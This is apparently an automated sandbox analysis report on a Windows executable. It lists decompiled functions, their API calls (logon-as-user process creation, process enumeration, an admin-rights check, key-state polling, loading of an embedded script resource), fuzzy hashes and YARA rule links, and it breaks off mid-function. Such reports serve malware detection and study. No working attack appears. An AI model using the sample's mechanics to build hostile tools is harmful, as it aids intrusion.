Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: ec6bf4e30b63eecbf0d60fc2a80122b1543f59ac2a14b10eea0208d452a67d2c
Instruction ID: e2fe70dbdbb7fb4cb105fa07b84e8d87da95af4e7ae2cdf2ccec7df29a511dca
Opcode Fuzzy Hash: ec6bf4e30b63eecbf0d60fc2a80122b1543f59ac2a14b10eea0208d452a67d2c
Instruction Fuzzy Hash: 27613875A10209FFDF00DFA5DC45AAEBBB9FF05300F0482AAE955A7290DB359A05CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B19ED8, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00B00817,?,?,00000000,00000000), ref: 00B19EE8
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00B00817,?,?,00000000,00000000), ref: 00B19EFF
LoadResource.KERNEL32(?,00000000,?,?,00B00817,?,?,00000000,00000000,?,?,?,?,?,?,00AC4A14), ref: 00B19F0F
SizeofResource.KERNEL32(?,00000000,?,?,00B00817,?,?,00000000,00000000,?,?,?,?,?,?,00AC4A14), ref: 00B19F20
LockResource.KERNEL32(00B00817,?,?,00B00817,?,?,00000000,00000000,?,?,?,?,?,?,00AC4A14,00000000), ref: 00B19F2F

Strings

SCRIPT, xrefs: 00B19EF5

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: e7df5d26e7865ee9982338c5133647afb4f93d1effc82aea0d08c0b759ab5275
Instruction ID: a655321124162fca2ec8e50fbfb6b91d709dbab2ee4588f151f5c175deeef924
Opcode Fuzzy Hash: e7df5d26e7865ee9982338c5133647afb4f93d1effc82aea0d08c0b759ab5275
Instruction Fuzzy Hash: 18117074210741BFE7209B65DC48F67BBB9EBC6B11F1042ACBA09D72A0DB71EC45CA60

Uniqueness

Uniqueness Score: -1.00%

Function 00B091CF, Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00B09200
OpenProcessToken.ADVAPI32(00000000), ref: 00B09207
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00B09216
CloseHandle.KERNEL32(00000004), ref: 00B09221
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B09250
DestroyEnvironmentBlock.USERENV(00000000), ref: 00B09264

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 6eb120e52c5cd3ea0685622606b3423bb9d1d605a8b892d67da439ca7d75687a
Instruction ID: 79dcf77a70fca074c480d0a8dd87cb4bd4a8a3ac5f80f35593560487e3126623
Opcode Fuzzy Hash: 6eb120e52c5cd3ea0685622606b3423bb9d1d605a8b892d67da439ca7d75687a
Instruction Fuzzy Hash: F311447660120EBBDB119FA4ED49BDA7BA9FB09304F044064FE05A21A1C6769E60EB61

Uniqueness

Uniqueness Score: -1.00%

Function 00AB2714, Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?,?,00B777B0,?,00B777B0,00B777B0,?,00B3C5FF,00000000,00000001,?,?,?,00AEBD40,?,?), ref: 00AB2727
ScreenToClient.USER32 ref: 00AB2744
GetAsyncKeyState.USER32(00000001), ref: 00AB2769
GetAsyncKeyState.USER32(00000002), ref: 00AB2777

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: c0b6b65b674138d44714f2f7355e69c59be38cfb24a1ef5fbfa694c86c949074
Instruction ID: 1d59cf4322063cbd220c263f596989605f26842238e6af009cc979fc9f1882be
Opcode Fuzzy Hash: c0b6b65b674138d44714f2f7355e69c59be38cfb24a1ef5fbfa694c86c949074
Instruction Fuzzy Hash: C6417C3550415AFFCF159F69C844AE9BBB8FB06334F20835AF82896291CB30AD91DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00AC4BAA, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00AC4AF7,?), ref: 00AC4BB8
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00AC4BCA

Strings

kernel32.dll, xrefs: 00AC4BB3
Wow64RevertWow64FsRedirection, xrefs: 00AC4BC4

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 0dd22d4f0e3208a73d736d557cab46b935f7db47b5e23ac35d0f347d0fc84b7c
Instruction ID: 0719b6d0d74b6182a789a7a2cc117b6a7d2a32be031af591ec52396dbb336ece
Opcode Fuzzy Hash: 0dd22d4f0e3208a73d736d557cab46b935f7db47b5e23ac35d0f347d0fc84b7c
Instruction Fuzzy Hash: 7DD0C2744307128FD3206F30DC08B0672E4AF05340B018C6DE485DA564DE74C980CA00

Uniqueness

Uniqueness Score: -1.00%

Function 00B14148, Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00B1416D
Process32FirstW.KERNEL32(00000000,?), ref: 00B1417B
Process32NextW.KERNEL32(00000000,?), ref: 00B1419B
CloseHandle.KERNEL32(00000000), ref: 00B14245

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 02c0da9349d37f65748aa25660605272b4c871e4b74d92c6a35e261f41edbfe2
Instruction ID: 53c472be329ce22cfb7f65810c8c2dd5613351ca8dd21e77b58479a782f1eb6f
Opcode Fuzzy Hash: 02c0da9349d37f65748aa25660605272b4c871e4b74d92c6a35e261f41edbfe2
Instruction Fuzzy Hash: BB3141712083419FD300EF50D885FAFBBE8FF96350F54096DF585921A2EB719A89CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00B14F1C, Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00B14F45
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00B14F5C
FreeSid.ADVAPI32(?), ref: 00B14F6C

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 03aec8b2546b1fa7cb2f657b466f8d02fa1453d510a649199651cb447a67d2ca
Instruction ID: 46909680abb25d3bcbafe8de72316af79a5d443615c22b957f0495e0fbd72625
Opcode Fuzzy Hash: 03aec8b2546b1fa7cb2f657b466f8d02fa1453d510a649199651cb447a67d2ca
Instruction Fuzzy Hash: B7F03C7591120CBFDB00DFE49C89AADB7B8FB08201F4044A9AA01E2280D7345A448B50

Uniqueness

Uniqueness Score: -1.00%

Function 00B1A6AD, Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,00B29B52,?,00B4098C,?), ref: 00B1A6DA
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,00B29B52,?,00B4098C,?), ref: 00B1A6EC

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: f542116213f0fab938a1bb2683135a83f4a75df11716222e8a9c6c69c437fbad
Instruction ID: 080d077a35531487f75408d326305c5dffff3c956b8e9fd751d089ddde3babcc
Opcode Fuzzy Hash: f542116213f0fab938a1bb2683135a83f4a75df11716222e8a9c6c69c437fbad
Instruction Fuzzy Hash: 86F0A73551522EBBDB20AFA4CC48FEA77ACFF09761F008265B908D7191DA709A40CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00ADA385, Relevance: 3.0, APIs: 2, Instructions: 8COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00AD8F87,?,?,?,00000001), ref: 00ADA38A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00ADA393

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 09f5469dde0fc240bae95f8e2efaefe4b5cd916f3cde159098f90146524c60c8
Instruction ID: 6d3303c911b96a6107bf3765de071e4754e4d2eab52cfbce45cc27bdf02b3986
Opcode Fuzzy Hash: 09f5469dde0fc240bae95f8e2efaefe4b5cd916f3cde159098f90146524c60c8
Instruction Fuzzy Hash: 5AB09235074208ABCA403F91EC09B883F78FB4AA62F004010FB0D46060CF7256508A99

Uniqueness

Uniqueness Score: -1.00%

Function 00B09369, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00B08FA7), ref: 00B09389

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 8ef7f11773c67bc6b43022369f60c976995b2c3b033660954965d4802dd8d361
Instruction ID: 7d9fd1f84293b8a474e2cf23cf8f09bf9aa65431fd8fd1408f384090c5e74437
Opcode Fuzzy Hash: 8ef7f11773c67bc6b43022369f60c976995b2c3b033660954965d4802dd8d361
Instruction Fuzzy Hash: 12D05E3226050EABEF019EA4DC01EAE3B69EB04B01F408111FE15C61A0C775D935AB60

Uniqueness

Uniqueness Score: -1.00%

Function 00ADA354, Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 00ADA35A

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 2354e9d79a21fe5fe95b6643cda65f834e1a7e5e6e85c5916320a43bb21edb26
Instruction ID: 0d74adbbf36b6ec8a607860b9fd0aa3aad3329cd1adf1d55e3186dc0b23a0e85
Opcode Fuzzy Hash: 2354e9d79a21fe5fe95b6643cda65f834e1a7e5e6e85c5916320a43bb21edb26
Instruction Fuzzy Hash: 69A0123003010CA78A002F41EC044447F6CE6055507004010F50C010218B3255104584

Uniqueness

Uniqueness Score: -1.00%

Function 00B3ABFF, Relevance: 49.8, APIs: 33, Instructions: 274
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00B3ABFF(intOrPtr _a4, struct HWND__** _a8) {
				int _v32;
				struct tagRECT _v48;
				struct tagRECT _v64;
				int _v68;
				void* _v72;
				int _v76;
				WCHAR* _v80;
				WCHAR* _v84;
				void* _v96;
				int _v100;
				void* __ebx;
				void* __edi;
				signed int _t90;
				long _t93;
				long _t95;
				void* _t97;
				void* _t105;
				long _t109;
				WCHAR* _t112;
				int _t123;
				signed int _t136;
				struct HDC__* _t151;
				int _t156;
				signed int _t157;
				signed int _t165;
				struct HWND__** _t168;
				intOrPtr _t176;
				int _t179;
				struct HWND__** _t180;
				int _t181;
				void* _t184;
				void* _t186;

				if( *0xb772b0 == 0) {
					_t176 = _a4;
					_t90 =  *(_t176 + 0x10);
					_t151 =  *(_t176 + 0x18);
					_v48.left = _t90 & 0x00000010;
					_t156 = _t90 & 0x00000006;
					_v48.right = _t90 & 0x00000001;
					_v32 = _t156;
					__eflags = _t156;
					if(_t156 == 0) {
						_t168 = _a8;
						__eflags =  *((intOrPtr*)(_t168 + 0x4c)) - 0xffffffff;
						if( *((intOrPtr*)(_t168 + 0x4c)) != 0xffffffff) {
							_push( *((intOrPtr*)(_t168 + 0x4c)));
						} else {
							_push(GetSysColor(0x12));
						}
						_t93 = SetTextColor(_t151, ??);
					} else {
						_t93 = SetTextColor(_t151, GetSysColor(0xe));
						_t168 = _a8;
					}
					__eflags =  *(_t168 + 0x48) - 0xffffffff;
					_v48.top = _t93;
					if( *(_t168 + 0x48) != 0xffffffff) {
						_v64.left = CreateSolidBrush( *(_t168 + 0x48));
						_t95 =  *(_t168 + 0x48);
					} else {
						_v64.top.left = GetSysColorBrush(0xf);
						_t95 = GetSysColor(0xf);
					}
					_v48.top = SetBkColor(_t151, _t95);
					_t97 = SelectObject(_t151, _v72);
					__eflags = _v68;
					_v64.right = _t97;
					_v72 = _t176 + 0x1c;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					if(_v68 == 0) {
						__eflags = _v76;
						if(_v76 != 0) {
							InflateRect( &_v48, 0xffffffff, 0xffffffff);
						}
						DrawFrameControl(_t151,  &_v48, 4, 0x10);
					} else {
						InflateRect( &_v48, 0xffffffff, 0xffffffff);
						_t186 = CreateSolidBrush(GetSysColor(0x10));
						FrameRect(_t151,  &(_v64.bottom), _t186);
						DeleteObject(_t186);
					}
					_t101 =  &_v48;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t179 = _v68;
					__eflags = _t179;
					if(_t179 == 0) {
						__eflags = _v76;
						if(_v76 == 0) {
							_push(0xfffffffe);
							_push(0xfffffffe);
						} else {
							_push(0xfffffffd);
							_push(0xfffffffd);
						}
						InflateRect(_t101, ??, ??);
						_v48.left = _v48.left - 1;
						_t38 =  &(_v48.top);
						 *_t38 = _v48.top - 1;
						__eflags =  *_t38;
					} else {
						InflateRect( &_v48, 0xfffffffe, 0xfffffffe);
					}
					FillRect(_t151,  &_v48, _v80);
					_t105 = 2;
					__eflags = _t179;
					if(_t179 != 0) {
						L24:
						_v64.top.left = _v64.top.left + _t105;
						_t45 =  &(_v64.right);
						 *_t45 = _v64.right + _t105;
						__eflags =  *_t45;
					} else {
						__eflags = _v72 - _t179;
						if(_v72 != _t179) {
							goto L24;
						}
					}
					_t180 = _a8;
					_t171 = 0x104;
					_v96 = 0x104;
					_t157 = GetWindowLongW( *_t180, 0xfffffff0);
					__eflags = _t157 & 0x00002000;
					if((_t157 & 0x00002000) == 0) {
						_t171 = 0x124;
						__eflags = 0x104;
						_v96 = 0x104;
					}
					__eflags = (_t157 & 0x00000300) - 0x300;
					if((_t157 & 0x00000300) == 0x300) {
						_t171 = _t171 | 0x00000001;
						__eflags = _t171;
						_v96 = _t171;
					}
					__eflags = _t157 & 0x00000200;
					if(__eflags == 0) {
						__eflags = _t157 & 0x00000100;
						if(__eflags == 0) {
							_t171 = _t171 | 0x00000001;
							__eflags = _t171;
							goto L33;
						}
					} else {
						_t136 = 2;
						_t171 = _t171 | _t136;
						L33:
						_v96 = _t171;
					}
					_t109 = SendMessageW( *_t180, 0xe, 0, 0);
					_t165 = 2;
					_t58 = _t109 + 1; // 0x1
					_t181 = _t58;
					_t112 = E00AD0FE6(_t151, _t171, __eflags,  ~(0 | __eflags > 0x00000000) | _t181 * _t165);
					_v80 = _t112;
					GetWindowTextW( *_a8, _t112, _t181);
					DrawTextW(_t151, _v80, 0xffffffff,  &(_v64.top), _t171);
					__eflags = _v72;
					if(_v72 != 0) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_v64.right = _v64.right + 1;
						_t74 =  &(_v64.bottom);
						 *_t74 = _v64.bottom.left + 1;
						__eflags =  *_t74;
						SetTextColor(_t151, GetSysColor(0x11));
						DrawTextW(_t151, _v84, 0xffffffff,  &_v64, _v100);
					}
					__eflags = _v84;
					if(_v84 != 0) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t184 = CreateSolidBrush(0);
						FrameRect(_t151,  &(_v64.top), _t184);
						DeleteObject(_t184);
						InflateRect( &_v64, 0xfffffffc, 0xfffffffc);
						DrawFocusRect(_t151,  &_v64);
					}
					L00AD105C(_v76);
					SelectObject(_t151, _v64);
					DeleteObject(_v96);
					SetTextColor(_t151, _v84);
					SetBkColor(_t151, _v80);
					_t123 = 1;
					__eflags = 1;
				} else {
					_t123 = E00B3AF18(_a4, _a8);
				}
				return _t123;
			}

0x00b3ac12
0x00b3ac24
0x00b3ac27
0x00b3ac2c
0x00b3ac32
0x00b3ac3b
0x00b3ac3e
0x00b3ac47
0x00b3ac4b
0x00b3ac4d
0x00b3ac60
0x00b3ac63
0x00b3ac67
0x00b3ac70
0x00b3ac69
0x00b3ac6d
0x00b3ac6d
0x00b3ac74
0x00b3ac4f
0x00b3ac55
0x00b3ac5b
0x00b3ac5b
0x00b3ac7a
0x00b3ac7e
0x00b3ac82
0x00b3aca3
0x00b3aca7
0x00b3ac84
0x00b3ac8e
0x00b3ac92
0x00b3ac92
0x00b3acb6
0x00b3acbb
0x00b3acc1
0x00b3acca
0x00b3acd3
0x00b3acd7
0x00b3acd8
0x00b3acd9
0x00b3acda
0x00b3acdb
0x00b3ad13
0x00b3ad18
0x00b3ad23
0x00b3ad23
0x00b3ad33
0x00b3acdd
0x00b3ace6
0x00b3acfb
0x00b3ad04
0x00b3ad0b
0x00b3ad0b
0x00b3ad41
0x00b3ad45
0x00b3ad46
0x00b3ad47
0x00b3ad48
0x00b3ad49
0x00b3ad4d
0x00b3ad4f
0x00b3ad5e
0x00b3ad63
0x00b3ad6b
0x00b3ad6d
0x00b3ad65
0x00b3ad65
0x00b3ad67
0x00b3ad67
0x00b3ad70
0x00b3ad76
0x00b3ad7a
0x00b3ad7a
0x00b3ad7a
0x00b3ad51
0x00b3ad56
0x00b3ad56
0x00b3ad88
0x00b3ad90
0x00b3ad91
0x00b3ad93
0x00b3ad9b
0x00b3ad9b
0x00b3ad9f
0x00b3ad9f
0x00b3ad9f
0x00b3ad95
0x00b3ad95
0x00b3ad99
0x00000000
0x00000000
0x00b3ad99
0x00b3ada3
0x00b3ada6
0x00b3adad
0x00b3adb9
0x00b3adbb
0x00b3adc1
0x00b3adc3
0x00b3adc3
0x00b3adc6
0x00b3adc6
0x00b3add3
0x00b3add5
0x00b3add7
0x00b3add7
0x00b3adda
0x00b3adda
0x00b3adde
0x00b3ade4
0x00b3aded
0x00b3adf3
0x00b3adf5
0x00b3adf5
0x00000000
0x00b3adf5
0x00b3ade6
0x00b3ade8
0x00b3ade9
0x00b3adf8
0x00b3adf8
0x00b3adf8
0x00b3ae04
0x00b3ae0e
0x00b3ae0f
0x00b3ae0f
0x00b3ae1e
0x00b3ae26
0x00b3ae2f
0x00b3ae42
0x00b3ae48
0x00b3ae4d
0x00b3ae59
0x00b3ae5a
0x00b3ae5b
0x00b3ae5c
0x00b3ae5d
0x00b3ae61
0x00b3ae61
0x00b3ae61
0x00b3ae6d
0x00b3ae83
0x00b3ae83
0x00b3ae89
0x00b3ae8e
0x00b3ae9a
0x00b3ae9b
0x00b3ae9c
0x00b3ae9d
0x00b3aea4
0x00b3aead
0x00b3aeb4
0x00b3aec3
0x00b3aecf
0x00b3aecf
0x00b3aed9
0x00b3aee4
0x00b3aeee
0x00b3aef9
0x00b3af04
0x00b3af0c
0x00b3af0c
0x00b3ac14
0x00b3ac1a
0x00b3ac1a
0x00b3af13

APIs

SetTextColor.GDI32(?,00000000), ref: 00B3AC55
GetSysColorBrush.USER32(0000000F), ref: 00B3AC86
GetSysColor.USER32(0000000F), ref: 00B3AC92
SetBkColor.GDI32(?,000000FF), ref: 00B3ACAC
SelectObject.GDI32(?,?), ref: 00B3ACBB
InflateRect.USER32(?,000000FF,000000FF), ref: 00B3ACE6
GetSysColor.USER32(00000010), ref: 00B3ACEE
CreateSolidBrush.GDI32(00000000), ref: 00B3ACF5
FrameRect.USER32 ref: 00B3AD04
DeleteObject.GDI32(00000000), ref: 00B3AD0B
InflateRect.USER32(?,000000FE,000000FE), ref: 00B3AD56
FillRect.USER32 ref: 00B3AD88
GetWindowLongW.USER32(?,000000F0), ref: 00B3ADB3

Part of subcall function 00B3AF18: GetSysColor.USER32(00000012), ref: 00B3AF51
Part of subcall function 00B3AF18: SetTextColor.GDI32(?,?), ref: 00B3AF55
Part of subcall function 00B3AF18: GetSysColorBrush.USER32(0000000F), ref: 00B3AF6B
Part of subcall function 00B3AF18: GetSysColor.USER32(0000000F), ref: 00B3AF76
Part of subcall function 00B3AF18: GetSysColor.USER32(00000011), ref: 00B3AF93
Part of subcall function 00B3AF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B3AFA1
Part of subcall function 00B3AF18: SelectObject.GDI32(?,00000000), ref: 00B3AFB2
Part of subcall function 00B3AF18: SetBkColor.GDI32(?,00000000), ref: 00B3AFBB
Part of subcall function 00B3AF18: SelectObject.GDI32(?,?), ref: 00B3AFC8
Part of subcall function 00B3AF18: InflateRect.USER32(?,000000FF,000000FF), ref: 00B3AFE7
Part of subcall function 00B3AF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B3AFFE
Part of subcall function 00B3AF18: GetWindowLongW.USER32(00000000,000000F0), ref: 00B3B013

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 6d6837f82ebe977ea557a54f545fb5bbee2b9b551e5171d2be3592c62f90c3f6
Instruction ID: 20fb4d248f3c6d1d3299dd1a67fac6aeaf9d9197c1a2f0e615837067cf248f9c
Opcode Fuzzy Hash: 6d6837f82ebe977ea557a54f545fb5bbee2b9b551e5171d2be3592c62f90c3f6
Instruction Fuzzy Hash: 37A17075018301AFD711AF64DC48E6B7BE9FF89321F200A19FAA6A71A1DB31D944CF52

Uniqueness

Uniqueness Score: -1.00%

Function 00AB2FE8, Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486
windowCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00AB2FE8(void* __ecx, int _a4) {
				struct HWND__* _v32;
				char _v48;
				void* _v52;
				int _v68;
				void* _v76;
				struct HWND__** _v80;
				struct HWND__* _v84;
				signed int _v88;
				signed int _v92;
				struct HWND__** _v96;
				struct HWND__* _v100;
				void* __ebx;
				char _t193;
				signed int _t198;
				int _t208;
				struct HMENU__* _t209;
				struct HMENU__* _t211;
				struct HWND__* _t218;
				struct HWND__* _t221;
				struct HMENU__* _t228;
				intOrPtr _t234;
				struct HWND__* _t236;
				signed int _t237;
				struct HWND__* _t243;
				struct HWND__* _t259;
				signed int _t262;
				struct HWND__* _t263;
				struct HWND__* _t273;
				int _t275;
				void* _t278;
				void* _t286;
				int _t288;
				void* _t291;
				void* _t303;
				void* _t309;
				struct HWND__** _t313;
				struct HWND__* _t316;
				struct HWND__* _t318;
				struct HWND__* _t320;
				void* _t325;
				struct HWND__* _t326;
				struct HWND__* _t328;
				signed int _t329;
				intOrPtr _t330;
				struct HWND__** _t332;
				signed char _t337;
				signed int _t338;
				struct HWND__* _t339;
				struct HWND__* _t340;
				struct HWND__* _t341;
				struct HWND__* _t342;
				struct HWND__** _t345;
				signed int _t346;
				int _t348;
				struct HWND__** _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				intOrPtr* _t355;
				signed int _t356;
				signed int _t358;

				_t348 = _a4;
				_t309 = __ecx;
				if(E00AB27D2(__ecx, _t348,  &_v92,  &_v88) == 0) {
					L16:
					_t193 = 0;
					L15:
					return _t193;
				}
				_v92 = _v92 | 0xffffffff;
				_t313 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x60)) + _v92 * 4))));
				_v96 = _t313;
				_t345 =  *( *( *((intOrPtr*)(__ecx + 0x74)) + _v88 * 4));
				_v80 = _t345;
				_t337 = _t345[0x24];
				_t198 = _t337 & 0x000000ff;
				if(_t198 <= 0x11) {
					if(__eflags == 0) {
